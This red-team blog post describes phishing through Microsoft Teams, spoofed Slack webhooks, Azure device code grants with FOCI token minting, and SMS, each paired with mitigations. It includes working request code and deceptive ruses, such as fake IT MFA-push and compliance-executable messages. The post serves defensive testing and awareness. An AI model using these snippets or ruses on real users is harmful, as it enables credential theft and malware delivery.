Thinking Outside the Mailbox: Modernized Phishing Techniques

As defensive controls have advanced, so too have adversaries’ approaches to social engineering. Landing a phishing email in an inbox has become harder, and most campaigns that do make it to an inbox are quickly reported, quarantined, or triaged. So adversaries have asked themselves: why not skip the inbox altogether, or leverage a service so trusted that even email security solutions trust it? In response, Praetorian’s Red Team has been working to weaponize and automate modern social engineering tactics, techniques, and procedures (TTPs) that emulate real-world threats. With the caveat that attack vectors are only as good as the pretext surrounding a social engineering campaign (why would I click this link or follow these directions?), Praetorian has used these modernized phishing techniques to identify gaps in real-world enterprise organizations.

A Word on Innovation

Some of the TTPs we will describe are not novel in the sense that Praetorian originally identified their abuse capabilities (please do read the references for credits, because as an industry we continuously stand on the shoulders of giants). What is novel is the way our Red Team has further developed existing capabilities and concepts to provide class-leading threat emulation capabilities to authorized targets. As much as our Red Team enjoys leveraging these attack vectors, Praetorian’s mission is to make the world a safer and more secure place. We do that in this post by providing insights into our Red Team’s innovative approaches and defensive recommendations.

Microsoft Teams

One of the growing trends in leveraging “trusted” services is to conduct phishing via Microsoft Teams. If an organization is using Office 365 and has its Teams chat set to allow communication outside of the organization, external attackers have a direct line of communication with employees. This vector presents a particularly convincing phishing guise, as many employees will implicitly trust direct messages sent to their corporate Teams account. Additionally, phishing via Teams allows for near-instant communication between the target and the attacker, giving the attacker an opportunity to interactively speak with the compromised target.

Our Approach

To conduct a Teams phishing campaign, the attacker needs two accounts: the main sending account and a secondary account to be attached to the message. The purpose of the second account is to convert the message with the target to a “Group Chat”. Group Chats go straight through to the target, whereas direct messages will first prompt the target to accept communication from someone outside of their organization.
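The group chat conversion can be scripted against the Microsoft Graph `POST /chats` endpoint. The following is a minimal sketch (not Praetorian’s tooling) that builds the request body for a group chat containing the two attacker-controlled accounts and the target; the object IDs and topic are hypothetical placeholders, and actually sending the request would additionally require a delegated Graph access token.

```python
import json

GRAPH = "https://graph.microsoft.com/v1.0"

def group_chat_payload(member_ids, topic=None):
    """Build the Microsoft Graph request body for a new group chat.

    member_ids: AAD object IDs of all participants -- here, the two
    attacker-controlled accounts plus the target. Using chatType "group"
    (rather than "oneOnOne") is what avoids the external-sender
    acceptance prompt described above.
    """
    payload = {
        "chatType": "group",
        "members": [
            {
                "@odata.type": "#microsoft.graph.aadUserConversationMember",
                "roles": ["owner"],
                "user@odata.bind": f"{GRAPH}/users('{uid}')",
            }
            for uid in member_ids
        ],
    }
    if topic:
        payload["topic"] = topic
    return payload

# Hypothetical object IDs: sender, secondary account, and target.
body = group_chat_payload(
    [
        "00000000-0000-0000-0000-000000000001",
        "00000000-0000-0000-0000-000000000002",
        "00000000-0000-0000-0000-000000000003",
    ],
    topic="IT Compliance Check",
)
print(json.dumps(body, indent=2))
```

The resulting JSON would be POSTed to `https://graph.microsoft.com/v1.0/chats` with a bearer token for the sending account.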

In past Red Team engagements, the Praetorian Red Team has successfully used this technique to distribute malware to targets and convince compromised targets to accept Multi-Factor Authentication (MFA) pushes sent to their device. To convince users to accept MFA pushes, we messaged the compromised target that IT had detected an issue with their MFA setup and would be conducting testing to troubleshoot the problem. Then we asked the target to “please accept all MFA pushes for the next hour”.

For malware (command and control) delivery, one particularly effective ruse that we have used is messaging a target that their laptop is out of compliance and they must run an IT-provided executable to comply. The target would receive a message similar to the one in Figure 1:

Figure 1: Example message received by phishing target.

Our Recommendation

To mitigate this phishing ruse, organizations can modify their Teams workspace settings in the Teams administration portal under the section labeled “External Access” (see Figure 2). This page offers three main options to configure: “Teams and Skype for Business users in external organizations”, “Teams accounts not managed by an organization”, and “Skype users”. If possible, Praetorian recommends disallowing communication with all external domains, unmanaged accounts, and Skype users.

Figure 2: Teams configuration with all communication disallowed.

However, your organization may have legitimate business needs that require a Teams configuration allowing external users. If disabling all external access to Teams is unfeasible, explore the following alternatives:

  1. Using allow lists to only allow certain domains access to the organization’s Teams accounts.
  2. Disallowing access to Teams accounts from unmanaged accounts (such as “outlook.com” accounts).

Slack Webhooks

Instead of Teams, many organizations opt to use Slack for their day-to-day communications. Slack-based phishing typically requires access to a compromised account or system, but this isn’t always the case.

Our Approach

Slack webhooks may look like normal URLs at first glance, but contain all the information needed to send messages within their corresponding Slack workspace. Furthermore, the deprecated-but-still-widely-used “legacy” webhook variant (formally called “Incoming Webhooks”) allows the sender to specify message properties like sender username, profile picture, and destination channel/user.

An attentive user might notice the additional APP tag appended to Slackbot’s name in Figure 3.

Figure 3: Slack message sent via a Slack webhook impersonating Slackbot.

Further investigation typically shows that the integration was added by a Slack administrator or IT team member, as in Figure 4.

Figure 4: The custom integration was added by a Slack Administrator.

If an attacker can obtain a valid, legacy Slack webhook, they can send a simple cURL request to get a malicious message in the direct messages of an employee. Following is the cURL request for the message in Figure 3:

```
curl -X POST --data-urlencode 'payload={"channel": "@target", "username": "SIackbot", "text": "This is an attacker-controlled message from Slackbot!", "icon_url": "https://a.slack-edge.com/80588/marketing/img/avatars/slackbot/avatar-slackbot@2x.png"}' https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX
```

Note that the sending username uses an upper-case letter “i” in the place of the lower-case letter “L”, as the actual name “Slackbot” is reserved.
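The same spoofed message can be sent from a script rather than cURL. The sketch below, using only the Python standard library, builds the `payload` form field that legacy webhooks accept; the message contents mirror the hypothetical example above, and the webhook URL itself is the attacker-obtained secret.

```python
import json
from urllib.parse import urlencode

def build_webhook_body(channel, username, text, icon_url):
    """Encode a legacy Slack webhook message as the form body the
    hooks.slack.com endpoint expects: a single `payload` field of JSON."""
    payload = {
        "channel": channel,
        "username": username,   # "SIackbot": capital I in place of l
        "text": text,
        "icon_url": icon_url,
    }
    return urlencode({"payload": json.dumps(payload)}).encode()

body = build_webhook_body(
    "@target",
    "SIackbot",
    "This is an attacker-controlled message from Slackbot!",
    "https://a.slack-edge.com/80588/marketing/img/avatars/slackbot/avatar-slackbot@2x.png",
)
# To send: urllib.request.urlopen(webhook_url, data=body)
```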

General techniques like Slackbot impersonation can be effective, but ruses informed by the target environment have the potential to be much more convincing. For example, if the target organization is known to use Okta, attackers may develop a ruse similar to the one shown in Figure 5.

Figure 5: An example credential capture campaign impersonating Okta within Slack.

To mitigate this issue, Slack has deprecated “legacy” webhooks and introduced a more restricted model, Slack apps, in which access must be granted on a per-channel basis. While the potential for phishing still exists with these newer webhooks, the possibilities are much more restricted. Regardless, many organizations that leverage Slack webhooks continue to use the legacy version, giving attackers a powerful tool for social engineering.

Our Recommendation

The best practice for securing your organization from Slack webhook phishing is to remove the legacy webhook integration and treat any existing webhooks as sensitive data. As the Slack documentation puts it: “Keep it secret, keep it safe. Your webhook URL contains a secret. Don’t share it online, including via public version control repositories.” If possible, migrate any of your existing Slack workflows to the newer and more secure Slack app model, which significantly reduces the impact of a Slack webhook exposure.

Identifying legacy webhooks can be tricky, as their format is visually identical to webhooks generated following current best practices. Both contain three fields within the URL: a value beginning with T, a value beginning with B, and 24 random characters. These values are the Slack workspace ID, the integration/bot ID for the webhook, and a secret value, respectively.
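The three fields can be pulled apart programmatically when auditing webhooks found in source code or logs. The following is a small sketch; the exact character classes are assumptions based on the observed URL format.

```python
import re

# T... workspace ID, B... integration/bot ID, 24-character secret,
# matching the URL structure described above.
WEBHOOK_RE = re.compile(
    r"https://hooks\.slack\.com/services/(T[A-Z0-9]+)/(B[A-Z0-9]+)/([A-Za-z0-9]{24})"
)

def parse_webhook(url):
    """Return (workspace_id, bot_id, secret) or None if not a webhook URL."""
    m = WEBHOOK_RE.fullmatch(url)
    return m.groups() if m else None

ids = parse_webhook(
    "https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX"
)
print(ids)  # ('T00000000', 'B00000000', 'XXXXXXXXXXXXXXXXXXXXXXXX')
```

The extracted B-value is the integration/bot ID needed to determine whether a given webhook is legacy.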

The solution is to use the integration/bot ID value to determine which integration or application was used to generate the webhook. Navigate to https://<workspace-name>.slack.com/services/B00000000 using the ID in question as the final value in the URL. If the URL is for a legacy webhook, the Incoming WebHooks Custom Integration will open. If the URL is for a non-legacy webhook, the website will redirect you to the Slack app the administrator used to generate the webhook.

Azure Device Code Phishing

Device code phishing is a specific type of “illicit consent grant” social engineering attack. At a high level, it abuses the OAuth 2.0 grant flow typically used by devices without an interactive browser or with limited input capabilities (e.g., TVs, IoT devices, printers). During a device code phishing attack, an attacker triggers the device code grant for an OAuth application and tricks the target into approving and authorizing the request. If successful, the attacker obtains a valid refresh token for a protected resource, typically with a 90-day lifetime.

Overall, Praetorian has found device code phishing to be a very effective technique, primarily due to the lack of traditional indicators that might raise alarm for targeted users. Specifically:

  • All end-user interaction and authentication occurs on the legitimate login.microsoftonline.com domain,
  • The consent screen does not display the implied permission scope, and
  • Traditional security awareness training typically does not cover client impersonation illicit consent attacks.

Our Approaches

Consent Behavior in OAuth Client Impersonation

As expected, Azure Active Directory (AAD) implements the OAuth 2.0 standard, including device code grants, but a couple of important quirks make AAD a particularly effective target for device code phishing.

First is the consent behavior attackers encounter when performing OAuth client impersonation using pre-authorized “first-party” applications as client IDs in the device code grant. This is far more deceptive than impersonating third-party applications. Traditional third-party OAuth illicit consent grants require attackers to register a malicious app which “needs” broad permissions, and then require targets to explicitly approve each permission for that third-party application, as in Figure 6. In contrast, Microsoft provides “implied consent” for first-party applications, which it includes in every tenant by default (e.g., Teams, Office, OneNote, etc.). Since these first-party applications are also public OAuth clients, they do not use secrets or certificates when redeeming an authorization code. Therefore, attackers can mimic these applications, inherit their implied consent, and still obtain the resulting refresh token.

Figure 6: Consent screen for a sample malicious third-party app named “Risky App” versus for a first-party client impersonation

Family of Client IDs

Secondly, Microsoft implements a minimally documented feature called “Family of Client IDs” (FOCI), which disregards standard OAuth security safeguards and allows special refresh tokens to mint new access tokens for other “family” application resources. This means if you obtain a refresh token to something like the Microsoft Graph API resource from a FOCI client ID, the token is not strictly bound to that resource. Therefore, a FOCI refresh token effectively provides access to the union of all scopes in the family, significantly increasing the reach of an attack. Additionally, from a logging/audit perspective, access tokens minted from refresh tokens do not appear in AAD interactive sign-in logs.
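As an illustration of the exchange, the sketch below builds the v2.0 token endpoint request that redeems a FOCI refresh token through a different family client. The client ID shown is widely published as belonging to Microsoft Teams, but treat it (and the placeholder token) as assumptions to verify against the FOCI research in the references.

```python
from urllib.parse import urlencode

TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

def foci_refresh_body(refresh_token, client_id, scope):
    """Form body redeeming a FOCI refresh token against a different
    family client/scope. No client secret is needed: these first-party
    applications are public OAuth clients."""
    return urlencode({
        "grant_type": "refresh_token",
        "refresh_token": refresh_token,
        "client_id": client_id,
        "scope": scope,
    })

# Client ID widely reported as Microsoft Teams (an assumption to verify).
body = foci_refresh_body(
    "0.ARoA...",  # refresh token obtained from the device code phish
    "1fec8e78-bce4-4aaf-ab1b-5451cc387264",
    "https://graph.microsoft.com/.default offline_access",
)
# POST body to TOKEN_URL to mint an access token for the new resource.
```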

FOCI refresh tokens can therefore provide a highly effective and dangerous access vector, especially when combined with device code phishing against AAD. For example, our engineers have conducted the following device code phishing access chain:

  1. Initiate the device code phish with client impersonation for a FOCI application (this can be automated with tools such as TokenTactics and AADInternals). The initial targeted resource will be the Azure AD Graph API.
  2. Convince a user to input the generated code and approve the grant with implied consent
    1. Vishing or Smishing can be helpful here
  3. Upon approval, obtain initial refresh token (logged as an interactive sign-in)
  4. Use the token to access and dump the AAD directory
    1. Can analyze valuable information on users/groups/applications
    2. Can explore AAD for other security weaknesses
  5. Mint access tokens for other resources (Teams channels/messages perhaps) for 90 days
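Steps 1 and 3 of the chain above can be sketched as follows. This minimal illustration builds the v1.0 device code and token request bodies; the client ID is widely published as “Microsoft Office” (a FOCI member), but should be treated as an assumption to verify against the FOCI research in the references.

```python
from urllib.parse import urlencode

DEVICE_CODE_URL = "https://login.microsoftonline.com/common/oauth2/devicecode"
TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"

# Client ID widely reported as "Microsoft Office" (assumption to verify).
CLIENT_ID = "d3590ed6-52b3-4102-aeff-aedf3c9988b9"

def device_code_body(resource="https://graph.windows.net"):
    """Step 1: form body requesting a device code for the Azure AD Graph
    resource. The response contains the user_code to put in front of the
    target and a device_code to poll with."""
    return urlencode({"client_id": CLIENT_ID, "resource": resource})

def token_poll_body(device_code):
    """Step 3: form body that redeems the device code for access and
    refresh tokens once the target approves the grant."""
    return urlencode({
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": CLIENT_ID,
        "code": device_code,
    })

# POST each body to DEVICE_CODE_URL / TOKEN_URL respectively, e.g. with
# urllib.request.urlopen(url, data=body.encode()).
```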

Our Recommendations

Organizations can implement four primary mitigations against abusing FOCI refresh tokens:

  • Conditional Access Policies: Focus on hardening sensitive resources and consider including “All Cloud Apps” in your policy criteria. However, be aware that MFA conditional access control requirements may not block minted access tokens since these refresh token grants are non-interactive and will inherit any MFA claim from the original token.
  • Auditing Interactive Sign-In Logs: Look for suspicious activity and/or “impossible traveler” type events, as the initial refresh token grant will be logged with the device/location from which the attacker initiated their device code grant.
  • Auditing Non-Interactive Sign-In Logs: A user creating an access token from a refresh token does generate an event, but it only appears in the less monitored non-interactive sign-in log. Defenders should monitor these for known FOCI client abuse.

  • Revoking Refresh Tokens: In most circumstances, a password reset does not automatically invalidate previously issued refresh tokens. Consider including the `Revoke-AzureADUserAllRefreshToken` PowerShell AzureAD cmdlet in incident response playbooks to revoke refresh tokens for potentially compromised accounts.

SMS Based Phishing (Smishing)

Organizations often include end-user security awareness training as part of their security programs. However, such training typically covers only email. Traditional security measures already subject email communications to Secure Email Gateway appliances and services with decades of research and development behind them. Additionally, organizations parse hyperlinks and attachments within email content and subject them to further scrutiny.

Our Approach

Given the difficulty of landing successful email-based phishing campaigns from reputable domains and services, Short Message Service (SMS) has become an additional vector in an attacker’s toolkit. Enterprises lack visibility into the SMS messages their employees receive, so an attacker can be confident that the target will receive the message. Smishing ruses often entice the target to visit an included hyperlink and hand over credentials or other sensitive information, as opposed to attempting to install malicious software on the mobile device. The hyperlink within a malicious SMS message directs visiting employees to a phishing portal, and because enterprises cannot enforce egress traffic controls over employees’ personal devices, the target is likely able to visit the phishing page and hand over credentials without being interrupted by technical security controls.

In some countries, such as the United Kingdom, the attacker can specify a sender name, such as “ACME” in Figure 7, in lieu of a mobile number. Other countries are more restrictive and allow only mobile numbers or short codes. Attackers cannot acquire the latter ad hoc, as they require a formal approval process.

Figure 7: Example of a Smishing Message on a target’s device

Our Recommendation

The prevalence of remote work means that most organizations now offer employees the ability to access organizational resources, such as email, from their mobile devices. IT departments achieve this through Bring Your Own Device (BYOD) and Mobile Device Management (MDM) approaches. These efforts to extend enterprise security controls to mobile devices address many potential threats, but not Smishing: employees are unlikely to want their employers to have visibility into communication channels that contain personal information.

The most effective way to mitigate the risk of Smishing attacks is to ensure the use of Multi-Factor Authentication (MFA) on all login endpoints, ideally with U2F. An attacker who captures credentials will have to take additional steps to use them successfully, imposing costs and increasing the opportunity for detection. However, MFA will not prevent Smishing attacks that do not aim to obtain login credentials. In these cases, old-fashioned end-user security awareness should come into play.

Theory Versus Reality

We encourage you to ask yourself whether your organization currently possesses the capability to prevent attacks that use these vectors. Are you able to detect them, and are you confident in your ability to respond? Even if the answers to these questions are a reassuring “yes,” consider the benefit your security team would derive from testing those assumptions in a forum designed for them to exercise their defensive capabilities. Given the ever-changing nature of attack vectors and defenses, the best way to make sure that your TTPs will be effective in a real-life phishing scenario is to pressure test them periodically.

References:

Microsoft Teams Abuse | mr.d0x
Slack phishing attacks using webhooks | AT&T Alien Labs
Incoming Webhooks | Slack
OAuth 2.0 device code flow | Microsoft Entra
Revoke-AzureADUserAllRefreshToken (AzureAD) | Microsoft Docs
GitHub – secureworks/family-of-client-ids-research: Research into Undocumented Behavior of Azure AD Refresh Tokens
Introducing a new phishing technique for compromising Office 365 accounts
The Identity of OAuth Public Clients | Okta Developer

About the Authors

Jon Goodgion

Jon is a Lead Security Engineer at Praetorian with a background in military and intelligence cyber operations. He is focused on Red Team engagements and testing defensive controls against the latest threats.

Mason Davis

Mason is a Senior Security Engineer at Praetorian. He primarily specializes in Red Teaming and other Corporate Security-focused service lines.

Matt Jackoski

Matt is a Red Team operator at Praetorian and currently is focused on performing adversarial emulation engagements for clients. Matt has a background in computer science and engineering with a focus in offensive security.

Nate Kirk

Nate is a Senior Practice Manager at Praetorian, currently managing the Praetorian Red Team and other offensive-based operations. Nate comes from an engineering background and specializes in Red Teaming, Purple Teaming and attack path mapping.

Walter Sagehorn

Walter is a Senior Security Engineer who enjoys providing clients with an attacker's perspective of their network through Red Teams and other adversarial exercises.
